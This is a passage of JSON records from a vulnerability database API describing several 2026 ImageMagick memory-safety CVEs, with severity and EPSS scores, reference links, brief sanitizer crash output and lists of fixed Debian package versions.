"fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" } ], "aliases": [ "CVE-2026-28689", "GHSA-493f-jh8w-qhx3" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-sw7g-hxxr-n3e1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/23948?format=api", "vulnerability_id": "VCID-tt6z-t31v-dkdd", "summary": "ImageMagick has an Out-of-bounds Write via InterpretImageFilename\nDue to an incorrect return value on certain platforms a pointer is incremented past the end of a buffer that is on the stack and that could result in an out of bounds write.\n\n```\n=================================================================\n==48558==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x00016b9b7490 at pc 0x0001046d48ac bp 0x00016b9b31d0 sp 0x00016b9b31c8\nWRITE of size 1 at 0x00016b9b7490 thread T0\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33536.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33536.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33536", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04109", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.045", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04429", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04528", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04378", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04412", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04423", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04367", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04359", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04368", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04391", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04408", "published_at": "2026-04-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33536" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33536", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33536" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8793-7xv6-82cf", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-27T13:44:35Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8793-7xv6-82cf" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33536", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33536" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451849", "reference_id": "2451849", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451849" }, { "reference_url": "https://github.com/advisories/GHSA-8793-7xv6-82cf", "reference_id": "GHSA-8793-7xv6-82cf", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8793-7xv6-82cf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1054646?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u7" } ], "aliases": [ "CVE-2026-33536", "GHSA-8793-7xv6-82cf" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tt6z-t31v-dkdd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/25007?format=api", "vulnerability_id": "VCID-tv15-dcnu-pbbn", "summary": "ImageMagick: Heap overflow in pcd decoder leads to out of bounds read.\nThe pcd coder lacks proper boundary checking when processing Huffman-coded data. The decoder contains an function that has an incorrect initialization that could cause an out of bounds read.\n\n```\n==3900053==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x502000003c6c at pc 0x55601b9cc552 bp 0x7ffd904b1f70 sp 0x7ffd904b1f60\nREAD of size 1 at 0x502000003c6c thread T0\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26284.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26284.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26284", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.06044", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.05823", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.05858", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.05853", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.05891", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.05923", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.05901", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.05892", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.05884", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.05849", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.0586", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.06013", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26284" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26284", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26284" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wrhr-rf8j-r842", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-24T20:46:33Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wrhr-rf8j-r842" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26284", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26284" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442137", "reference_id": "2442137", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442137" }, { "reference_url": "https://github.com/advisories/GHSA-wrhr-rf8j-r842", "reference_id": "GHSA-wrhr-rf8j-r842", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wrhr-rf8j-r842" }, { "reference_url": "https://usn.ubuntu.com/8069-1/", "reference_id": "USN-8069-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8069-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" } ], "aliases": [ "CVE-2026-26284", "GHSA-wrhr-rf8j-r842" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tv15-dcnu-pbbn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24918?format=api", "vulnerability_id": "VCID-utfe-h3b7-jqcj", "summary": "ImageMagick: MSL - Stack overflow in ProcessMSLScript\n### Summary\nMagick fails to check for circular references between two MSLs, leading to a stack overflow.\n\n### Details\nAfter reading a.msl using magick, the following is displayed:\n\n`MSLStartElement` -> `ReadImage` -> `ReadMSLImage` -> `ProcessMSLScript` -> `xmlParseChunk` -> `xmlParseTryOrFinish` -> `MSLStartElement`\n\n```bash\nAddressSanitizer:DEADLYSIGNAL\n=================================================================\n==114345==ERROR: AddressSanitizer: UNKNOWN SIGNAL on unknown address 0x000000000000 (pc 0x72509fc7d804 bp 0x7ffd6598b390 sp 0x7ffd6598ab20 T0)\n #0 0x72509fc7d804 in strlen ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:388\n[...]\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25971.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25971.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25971", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13041", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13153", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13209", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13007", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13088", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13138", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13107", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13068", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13017", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.12919", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.12922", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.1302", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25971" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25971", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25971" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8mpr-6xr2-chhc", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8mpr-6xr2-chhc" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25971", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25971" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442117", "reference_id": "2442117", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442117" }, { "reference_url": "https://github.com/advisories/GHSA-8mpr-6xr2-chhc", "reference_id": "GHSA-8mpr-6xr2-chhc", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8mpr-6xr2-chhc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" } ], "aliases": [ "CVE-2026-25971", "GHSA-8mpr-6xr2-chhc" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": 